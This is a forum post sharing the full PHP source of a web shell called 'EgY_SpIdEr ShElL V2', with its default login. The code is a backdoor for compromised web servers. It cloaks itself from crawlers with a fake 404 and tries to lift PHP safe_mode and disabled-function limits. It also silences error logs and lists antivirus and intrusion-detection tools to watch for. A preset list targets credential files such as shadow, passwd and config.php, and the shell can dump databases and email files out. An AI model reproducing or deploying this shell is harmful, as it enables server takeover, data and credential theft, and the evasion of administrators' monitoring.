Private Arab Shell - Web Application Security

Xin

[hide]Sharing this just for you guys :), username iexploit pass:iexploit.org

[code]<?
###########################################
# EgY_SpIdEr ShElL V2 #
# EgY_SpIdEr #
# www.egyspider.com #
###########################################

//Change User & Password

$tacfgd['uname'] = 'iexploit';
$tacfgd['pword'] = 'iexploit.org';

// Title of page.
$tacfgd['title'] = 'T3eS ShElL';

// Text to appear just above login form.
$tacfgd['helptext'] = 'T3eS ShElL';

// Set to true to enable the optional remember-me feature, which stores encrypted login details to
// allow users to be logged-in automatically on their return. Turn off for a little extra security.
$tacfgd['allowrm'] = true;

// If you have multiple protected pages, and there's more than one username / password combination,
// you need to group each combination under a distinct rmgroup so that the remember-me feature
// knows which login details to use.
$tacfgd['rmgroup'] = 'default';

// Set to true if you use your own sessions within your protected page, to stop txtAuth interfering.
// In this case, you _must_ call session_start() before you require() txtAuth. Logging out will not
// destroy the session, so that is left up to you.
$tacfgd['ownsessions'] = false;

foreach ($tacfgd as $key => $val) {
if (!isset($tacfg[$key])) $tacfg[$key] = $val;
}

if (!$tacfg['ownsessions']) {
session_name('txtauth');
session_start();
}

// Logout attempt made. Deletes any remember-me cookie as well
if (isset($_GET['logout']) || isset($_POST['logout'])) {
setcookie('txtauth_'.$rmgroup, '', time()-86400*14);
if (!$tacfg['ownsessions']) {
$_SESSION = array();
session_destroy();
}
else $_SESSION['txtauthin'] = false;
}
// Login attempt made
elseif (isset($_POST['login'])) {
if ($_POST['uname'] == $tacfg['uname'] && $_POST['pword'] == $tacfg['pword']) {
$_SESSION['txtauthin'] = true;
if ($_POST['rm']) {
// Set remember-me cookie for 2 weeks
setcookie('txtauth_'.$rmgroup, md5($tacfg['uname'].$tacfg['pword']), time()+86400*14);
}
}
else $err = 'Login Faild !';
}
// Remember-me cookie exists
elseif (isset($_COOKIE['txtauth_'.$rmgroup])) {
if (md5($tacfg['uname'].$tacfg['pword']) == $_COOKIE['txtauth_'.$rmgroup] && $tacfg['allowrm']) {
$_SESSION['txtauthin'] = true;
}
else $err = 'Login Faild !';
}
if (!$_SESSION['txtauthin']) {
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
?>
<html dir=rtl>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title><?=$tacfg['title']?></title>

<STYLE>

BODY
{
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
}

tr {
BORDER-RIGHT: #dadada ;
BORDER-TOP: #dadada ;
BORDER-LEFT: #dadada ;
BORDER-BOTTOM: #dadada ;
color: #ffffff;
}
td {
BORDER-RIGHT: #dadada ;
BORDER-TOP: #dadada ;
BORDER-LEFT: #dadada ;
BORDER-BOTTOM: #dadada ;
color: #dadada;
}
.table1 {
BORDER: 1;
BACKGROUND-COLOR: #000000;
color: #333333;
}
.td1 {
BORDER: 1;
font: 7pt tahoma;
color: #ffffff;
}
.tr1 {
BORDER: 1;
color: #dadada;
}
table {
BORDER: #eeeeee outset;
BACKGROUND-COLOR: #000000;
color: #dadada;
}
input {
BORDER-RIGHT: #00FF00 1 solid;
BORDER-TOP: #00FF00 1 solid;
BORDER-LEFT: #00FF00 1 solid;
BORDER-BOTTOM: #00FF00 1 solid;
BACKGROUND-COLOR: #333333;
font: 9pt tahoma;
color: #ffffff;
}
select {
BORDER-RIGHT: #ffffff 1 solid;
BORDER-TOP: #999999 1 solid;
BORDER-LEFT: #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #000000;
font: 9pt tahoma;
color: #dadada;;
}
submit {
BORDER: buttonhighlight 1 outset;
BACKGROUND-COLOR: #272727;
width: 40%;
color: #dadada;
}
textarea {
BORDER-RIGHT: #ffffff 1 solid;
BORDER-TOP: #999999 1 solid;
BORDER-LEFT: #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #333333;
font: Fixedsys bold;
color: #ffffff;
}
BODY {
margin: 1;
color: #dadada;
background-color: #000000;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}

</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';

<body>
<br><br><div style="font-size: 14pt;" align="center"><?=$tacfg['title']?></div>
<hr width="300" size="1" noshade color="#cdcdcd">
<p>
<div align="center" class="grey">
<?=$tacfg['helptext']?>
</div>
<p>
<?
if (isset($_SERVER['REQUEST_URI'])) $action = $_SERVER['REQUEST_URI'];
else $action = $_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];
if (strpos($action, 'logout=1', strpos($action, '?')) !== false) $action = str_replace('logout=1', '', $action);
?>
<form name="txtauth" action="<?=$action?>" method="post">
<div align="center">
<table border="0" cellpadding="4" cellspacing="0" bgcolor="#666666" style="border: 1px double #dedede;" dir="ltr">
<?=(isset($err))?'<tr><td colspan="2" align="center"><font color="red">'.$err.'</font></td></tr>':''?>
<?if (isset($tacfg['uname'])) {?>
<tr><td>User:</td><td><input type="text" name="uname" value="" size="20" maxlength="100" class="txtbox"></td></tr>
<?}?>
<tr><td>Password:</td><td><input type="password" name="pword" value="" size="20" maxlength="100" class="txtbox"></td></tr>
<?if ($tacfg['allowrm']) {?>
<tr><td align="left"><input type="submit" name="login" value="Login">
</td><td align="right"><input type="checkbox" name="rm" id="rm"><label for="rm">
Remmeber Me?</label></td></tr>
<?} else {?>
<tr><td colspan="2" align="center">
<input type="submit" name="login" value="Login"></td></tr>
<?}?>
</table>
</div>
</form>

<br><br>
<hr width="300" size="1" noshade color="#cdcdcd">
<div class="smalltxt" align="center">Developed by
<a href="mailto:egy_spider@hotmail.com">EgY SpIdEr </a>· copyright ©
& EgY SpIdEr</div>

</body>
</html>
<?
// Don't delete this!
exit();
}
?>
Login As (<font color="#FF0000"><? echo $tacfgd['uname']; ?></font>) <a href="?logout=1">Logout</a></p>
<div align="right">
<?php

if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}

$language='ar';

$auth = 0;

$name='7d1f6442a9ed59e62f93dcbc2695baa6';
$pass='7d1f6442a9ed59e62f93dcbc2695baa6';

//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
@setlocale(LC_ALL,'ru_RU.cp1251');

@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");

if(@function_exists('ini_set'))
{
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('file_uploads',1);
@ini_set('allow_url_fopen',1);
}
else
{
@ini_alter('error_log',NULL);
@ini_alter('log_errors',0);
@ini_alter('file_uploads',1);
@ini_alter('allow_url_fopen',1);
}

error_reporting(E_ALL);

/* ??? ????? */
$userful = array('gcc',', lcc',', cc',', ld',', php',', perl',', python',', ruby',', make',', tar',', gzip',', bzip',', bzip2',', nc',', locate',', suidperl');
$danger = array(', kav',', nod32',', bdcored',', uvscan',', sav',', drwebd',', clamd',', rkhunter',', chkrootkit',', iptables',', ipfw',', tripwire',', shieldcc',', portsentry',', snort',', ossec',', lidsadm',', tcplodg',', sxid',', logcheck',', logwatch',', sysmask',', zmbscap',', sawmill',', wormscan',', ninja');
$tempdirs = array(@ini_get('session.save_path').'/',@ini_get('upload_tmp_dir').'/','/tmp/','/dev/shm/','/var/tmp/');
$downloaders = array('wget','fetch','lynx','links','curl','get');

/* ??? ?????? ???????? ???? ????? realpath() */
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
//$chars_rlph = "_-.01234567890abcdefghijklnmopqrstuvwxyz";
//$chars_rlph = "_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ";
//$chars_rlph = "_-.abcdefghijklnmopqrstuvwxyz";
//$chars_rlph = "_-.01234567890";
$chars_rlph = "abcdefghijklnmopqrstuvwxyz";

$presets_rlph = array('index.php','.htaccess','.htpasswd','httpd.conf','vhosts.conf','cfg.php','config.php','config.inc.php','config.default.php','config.inc.php',
'shadow','passwd','.bash_history','.mysql_history','master.passwd','user','admin','password','administrator','phpMyAdmin','security','php.ini','cdrom','root',
'my.cnf','pureftpd.conf','proftpd.conf','ftpd.conf','resolv.conf','login.conf','smb.conf','sysctl.conf','syslog.conf','access.conf','accounting.log','home','htdocs',
'access','auth','error','backup','data','back','sysconfig','phpbb','phpbb2','vbulletin','vbullet','phpnuke','cgi-bin','html','robots.txt','billing');

/******************************************************************************************************/

define("starttime",@getmicrotime());

if((!@function_exists('ini_get')) || (@ini_get('open_basedir')!=NULL) || (@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;} else{$open_basedir=0;};

set_magic_quotes_runtime(0);
@set_time_limit(0);
if(@function_exists('ini_set'))
{
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
}
else
{
@ini_alter('max_execution_time',0);
@ini_alter('output_buffering',0);
}
$safe_mode = @ini_get('safe_mode');
#if(@function_exists('ini_get')){$safe_mode = @ini_get('safe_mode');}else{$safe_mode=1;};
$version = '1.42';
if(@version_compare(@phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
$_COOKIE = &$HTTP_COOKIE_VARS;
}
if (@get_magic_quotes_gpc())
{
foreach ($_POST as $k=>$v)
{
$_POST[$k] = stripslashes($v);
}
foreach ($_COOKIE as $k=>$v)
{
$_COOKIE[$k] = stripslashes($v);
}
}

if($auth == 1) {
if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
{
header('WWW-Authenticate: Basic realm="HELLO!"');
header('HTTP/1.0 401 Unauthorized');
exit("<h1>Access Denied</h1>");
}
}

if(!isset($_COOKIE['tempdir'],$_COOKIE['select_tempdir'])) {
$tempdir='./';
$select_tempdir = '<select name=tempdir><option value="./">./</option>';
foreach( $tempdirs as $item) {
if(@is_writable($item)){$select_tempdir .= '<option value="'.$item.'">'.$item.'</option>';$tempdir=$item;}
}
$select_tempdir .= '</select>';
setcookie('tempdir',$tempdir);
setcookie('select_tempdir',$select_tempdir);
}else{
if(isset($_POST['tempdir'])){$tempdir = $_POST['tempdir'];}else{$tempdir = $_COOKIE['tempdir'];}
$select_tempdir = $_COOKIE['select_tempdir'];
}

$head = '
<html>
<head>
<meta http-equiv="Content-Language" content="ar-sa">
<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
<title>EgY_SpIdEr ShElL</title>

<STYLE>

BODY
{
SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #666666; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
}

tr {
BORDER-RIGHT: #333333 ;
BORDER-TOP: #333333 ;
BORDER-LEFT: #333333 ;
BORDER-BOTTOM: #333333 ;
color: #FFFFFF;
}
td {
BORDER-RIGHT: #333333 ;
BORDER-TOP: #333333 ;
BORDER-LEFT: #333333 ;
BORDER-BOTTOM: #333333 ;
color: #FFFFFF;
}
.table1 {
BORDER: 1;
BACKGROUND-COLOR: #000000;
color: #333333;
}
.td1 {
BORDER: 1;
font: 7pt tahoma;
color: #ffffff;
}
.tr1 {
BORDER: 1;
color: #333333;
}
table {
BORDER: #eeeeee outset;
BACKGROUND-COLOR: #000000;
color: #333333;
}
input {
BORDER-RIGHT: #00FF00 1 solid;
BORDER-TOP: #00FF00 1 solid;
BORDER-LEFT: #00FF00 1 solid;
BORDER-BOTTOM: #00FF00 1 solid;
BACKGROUND-COLOR: #333333;
font: 9pt tahoma;
color: #ffffff;
}
select {
BORDER-RIGHT: #ffffff 1 solid;
BORDER-TOP: #999999 1 solid;
BORDER-LEFT: #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #000000;
font: 9pt tahoma;
color: #333333;;
}
submit {
BORDER: buttonhighlight 1 outset;
BACKGROUND-COLOR: #272727;
width: 40%;
color: #333333;
}
textarea {
BORDER-RIGHT: #ffffff 1 solid;
BORDER-TOP: #999999 1 solid;
BORDER-LEFT: #999999 1 solid;
BORDER-BOTTOM: #ffffff 1 solid;
BACKGROUND-COLOR: #333333;
font: Fixedsys bold;
color: #ffffff;
}
BODY {
margin: 1;
color: #333333;
background-color: #000000;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}

</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
document.getElementById(id).style.display = \'none\';
document.cookie=id+\'=0;\';
}
function show_div(id)
{
document.getElementById(id).style.display = \'block\';
document.cookie=id+\'=1;\';
}
function change_divst(id)
{
if (document.getElementById(id).style.display == \'none\')
show_div(id);
else
hide_div(id);
}
</script>';
class zipfile
{
var $datasec = array();
var $ctrl_dir = array();
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
var $old_offset = 0;
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] < 1980) {
$timearray['year'] = 1980;
$timearray['mon'] = 1;
$timearray['mday'] = 1;
$timearray['hours'] = 0;
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
}
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
}
function addFile($data, $name, $time = 0)
{
$name = str_replace('\\', '/', $name);
$dtime = dechex($this->unix2DosTime($time));
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$fr = "\x50\x4b\x03\x04";
$fr .= "\x14\x00";
$fr .= "\x00\x00";
$fr .= "\x08\x00";
$fr .= $hexdtime;
$unc_len = strlen($data);
$crc = crc32($data);
$zdata = gzcompress($data);
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
$c_len = strlen($zdata);
$fr .= pack('V', $crc);
$fr .= pack('V', $c_len);
$fr .= pack('V', $unc_len);
$fr .= pack('v', strlen($name));
$fr .= pack('v', 0);
$fr .= $name;
$fr .= $zdata;
$this -> datasec[] = $fr;
$cdrec = "\x50\x4b\x01\x02";
$cdrec .= "\x00\x00";
$cdrec .= "\x14\x00";
$cdrec .= "\x00\x00";
$cdrec .= "\x08\x00";
$cdrec .= $hexdtime;
$cdrec .= pack('V', $crc);
$cdrec .= pack('V', $c_len);
$cdrec .= pack('V', $unc_len);
$cdrec .= pack('v', strlen($name) );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('v', 0 );
$cdrec .= pack('V', 32 );
$cdrec .= pack('V', $this -> old_offset );
$this -> old_offset += strlen($fr);
$cdrec .= $name;
$this -> ctrl_dir[] = $cdrec;
}
function file()
{
$data = implode('', $this -> datasec);
$ctrldir = implode('', $this -> ctrl_dir);
return
$data .
$ctrldir .
$this -> eof_ctrl_dir .
pack('v', sizeof($this -> ctrl_dir)) .
pack('v', sizeof($this -> ctrl_dir)) .
pack('V', strlen($ctrldir)) .
pack('V', strlen($data)) .
"\x00\x00";
}
}

function compress(&$filename,&$filedump,$compress)
{
global $content_encoding;
global $mime_type;
if ($compress == 'bzip' && @function_exists('bzcompress'))
{
$filename .= '.bz2';
$mime_type = 'application/x-bzip2';
$filedump = bzcompress($filedump);
}
else if ($compress == 'gzip' && @function_exists('gzencode'))
{
$filename .= '.gz';
$content_encoding = 'x-gzip';
$mime_type = 'application/x-gzip';
$filedump = gzencode($filedump);
}
else if ($compress == 'zip' && @function_exists('gzcompress'))
{
$filename .= '.zip';
$mime_type = 'application/zip';
$zipfile = new zipfile();
$zipfile -> addFile($filedump, substr($filename, 0, -4));
$filedump = $zipfile -> file();
}
else
{
$mime_type = 'application/octet-stream';
}
}

function moreread($temp){
global $lang,$language;
$str='';
if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('feof')&&@function_exists('fclose') && ($ffile = @fopen($temp, "r"))){
if($ffile){
while(!@feof($ffile)){$str .= @fgets($ffile);};
fclose($ffile);
}
}elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')&&($ffile = @fopen($temp, "r"))){
if($ffile){
$str = @fread($ffile, @filesize($temp));
@fclose($ffile);
}
}elseif(@function_exists('file')&&($ffiles = @file($temp))){
foreach ($ffiles as $ffile) { $str .= $ffile; }
}elseif(@function_exists('file_get_contents')){
$str = @file_get_contents($temp);
}elseif(@function_exists('readfile')){
$str = @readfile($temp);
}elseif(@function_exists('highlight_file')){
$str = @highlight_file($temp);
}elseif(@function_exists('show_source')){
$str = @show_source($temp);
}else{echo $lang[$language.'_text56'];}
return $str;
}

function readzlib($filename,$temp=''){
global $lang,$language;
$str='';
if(!$temp) {$temp=tempnam(@getcwd(), "copytemp");};
if(@copy("compress.zlib://".$filename, $temp)) {
$str = moreread($temp);
} else echo $lang[$language.'_text119'];
@unlink($temp);
return $str;
}

function morewrite($temp,$str='')
{
global $lang,$language;
if(@function_exists('fopen') && @function_exists('fwrite') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
if($ffile){
@fwrite($ffile,$str);
@fclose($ffile);
}
}elseif(@function_exists('fopen') && @function_exists('fputs') && @function_exists('fclose') && ($ffile=@fopen($temp,"wb"))){
if($ffile){
@fputs($ffile,$str);
@fclose($ffile);
}
}elseif(@function_exists('file_put_contents')){
@file_put_contents($temp,$str);
}else return 0;
return 1;
}

function mailattach($to,$from,$subj,$attach)
{
$headers = "From: $from\r\n";
$headers .= "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: ".$attach['type'];
$headers .= "; name=\"".$attach['name']."\"\r\n";
$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
$headers .= chunk_split(base64_encode($attach['content']))."\r\n";
if(mail($to,$subj,"",$headers)) { return 1; }
return 0;
}
class my_sql
{
var $host = 'localhost';
var $port = '';
var $user = '';
var $pass = '';
var $base = '';
var $db = '';
var $connection;
var $res;
var $error;
var $rows;
var $columns;
var $num_rows;
var $num_fields;
var $dump;

function connect()
{
switch($this->db)
{
case 'MySQL':
if(empty($this->port)) { $this->port = '3306'; }
if(!@function_exists('mysql_connect')) return 0;
$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'MSSQL':
if(empty($this->port)) { $this->port = '1433'; }
if(!@function_exists('mssql_connect')) return 0;
$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
if($this->connection) return 1;
break;
case 'PostgreSQL':
if(empty($this->port)) { $this->port = '5432'; }
$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
if(!@function_exists('pg_connect')) return 0;
$this->connection = @pg_connect($str);
if(is_resource($this->connection)) return 1;
break;
case 'Oracle':
if(!@function_exists('ocilogon')) return 0;
$this->connection = @ocilogon($this->user, $this->pass, $this->base);
if(is_resource($this->connection)) return 1;
break;
case 'MySQLi':
if(empty($this->port)) { $this->port = '3306'; }
if(!@function_exists('mysqli_connect')) return 0;
$this->connection = @mysqli_connect($this->host,$this->user,$this->pass,$this->base,$this->port);
if(is_resource($this->connection)) return 1;
break;
case 'mSQL':
if(!@function_exists('msql_connect')) return 0;
$this->connection = @msql_connect($this->host.':'.$this->port,$this->user,$this->pass);
if(is_resource($this->connection)) return 1;
break;
case 'SQLite':
if(!@function_exists('sqlite_open')) return 0;
$this->connection = @sqlite_open($this->base);
if(is_resource($this->connection)) return 1;
break;
}
return 0;
}

function select_db()
{
switch($this->db)
{
case 'MySQL':
if(@mysql_select_db($this->base,$this->connection)) return 1;
break;
case 'MSSQL':
if(@mssql_select_db($this->base,$this->connection)) return 1;
break;
case 'PostgreSQL':
return 1;
break;
case 'Oracle':
return 1;
break;
case 'MySQLi':
return 1;
break;
case 'mSQL':
if(@msql_select_db($this->base,$this->connection)) return 1;
break;
case 'SQLite':
return 1;
break;
}
return 0;
}

function query($query)
{
$this->res=$this->error='';
switch($this->db)
{
case 'MySQL':
if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
{
$this->error = @mysql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'MSSQL':
if(false===($this->res=@mssql_query($query,$this->connection)))
{
$this->error = 'Query error';
return 0;
}
else if(@mssql_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'PostgreSQL':
if(false===($this->res=@pg_query($this->connection,$query)))
{
$this->error = @pg_last_error($this->connection);
return 0;
}
else if(@pg_num_rows($this->res) > 0) { return 1; }
return 2;
break;
case 'Oracle':
if(false===($this->res=@ociparse($this->connection,$query)))
{
$this->error = 'Query parse error';
}
else
{
if(@ociexecute($this->res))
{
if(@ocirowcount($this->res) != 0) return 2;
return 1;
}
$error = @ocierror();
$this->error=$error['message'];
}
break;
case 'MySQLi':
if(false===($this->res=@mysqli_query($this->connection,$query)))
{
$this->error = @mysqli_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'mSQL':
if(false===($this->res=@msql_query($query,$this->connection)))
{
$this->error = @msql_error($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
case 'SQLite':
if(false===($this->res=@sqlite_query($this->connection,$query)))
{
$this->error = @sqlite_error_string($this->connection);
return 0;
}
else if(is_resource($this->res)) { return 1; }
return 2;
break;
}
return 0;
}
function get_result()
{
$this->rows=array();
$this->columns=array();
$this->num_rows=$this->num_fields=0;
switch($this->db)
{
case 'MySQL':
$this->num_rows=@mysql_num_rows($this->res);
$this->num_fields=@mysql_num_fields($this->res);
while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
@mysql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MSSQL':
$this->num_rows=@mssql_num_rows($this->res);
$this->num_fields=@mssql_num_fields($this->res);
while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
@mssql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
break;
case 'PostgreSQL':
$this->num_rows=@pg_num_rows($this->res);
$this->num_fields=@pg_num_fields($this->res);
while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
@pg_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'Oracle':
$this->num_fields=@ocinumcols($this->res);
while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
@ocifreestatement($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'MySQLi':
$this->num_rows=@mysqli_num_rows($this->res);
$this->num_fields=@mysqli_num_fields($this->res);
while(false !== ($this->rows[] = @mysqli_fetch_assoc($this->res)));
@mysqli_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'mSQL':
$this->num_rows=@msql_num_rows($this->res);
$this->num_fields=@msql_num_fields($this->res);
while(false !== ($this->rows[] = @msql_fetch_array($this->res)));
@msql_free_result($this->res);
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
case 'SQLite':
$this->num_rows=@sqlite_num_rows($this->res);
$this->num_fields=@sqlite_num_fields($this->res);
while(false !== ($this->rows[] = @sqlite_fetch_array($this->res)));
if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
break;
}
return 0;
}
function dump($table)
{
if(empty($table)) return 0;
$this->dump=array();
$this->dump[0] = '##';
$this->dump[1] = '## --------------------------------------- ';
$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
$this->dump[3] = '## Database: '.$this->base;
$this->dump[4] = '## Table: '.$table;
$this->dump[5] = '## --------------------------------------- ';
switch($this->db)
{
case 'MySQL':
$this->dump[0] = '## MySQL dump';
if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
$this->dump[] = $this->rows[0]['Create Table'];
$this->dump[] = '## --------------------------------------- ';
if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MSSQL':
$this->dump[0] = '## MSSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'PostgreSQL':
$this->dump[0] = '## PostgreSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'Oracle':
$this->dump[0] = '## ORACLE dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'MySQLi':
$this->dump[0] = '## MySQLi dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysqli_real_escape_string($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'mSQL':
$this->dump[0] = '## mSQL dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
case 'SQLite':
$this->dump[0] = '## SQLite dump';
if($this->query('SELECT * FROM '.$table)!=1) return 0;
if(!$this->get_result()) return 0;
for($i=0;$i<$this->num_rows;$i++)
{
foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
}
break;
default:
return 0;
break;
}
return 1;
}
function close()
{
switch($this->db)
{
case 'MySQL':
@mysql_close($this->connection);
break;
case 'MSSQL':
@mssql_close($this->connection);
break;
case 'PostgreSQL':
@pg_close($this->connection);
break;
case 'Oracle':
@oci_close($this->connection);
break;
case 'MySQLi':
@mysqli_close($this->connection);
break;
case 'mSQL':
@msql_close($this->connection);
break;
case 'SQLite':
@sqlite_close($this->connection);
break;
}
}
function affected_rows()
{
switch($this->db)
{
case 'MySQL':
return @mysql_affected_rows($this->res);
break;
case 'MSSQL':
return @mssql_affected_rows($this->res);
break;
case 'PostgreSQL':
return @pg_affected_rows($this->res);
break;
case 'Oracle':
return @ocirowcount($this->res);
break;
case 'MySQLi':
return @mysqli_affected_rows($this->res);
break;
case 'mSQL':
return @msql_affected_rows($this->res);
break;
case 'SQLite':
return @sqlite_changes($this->res);
break;
default:
return 0;
break;
}
}
}
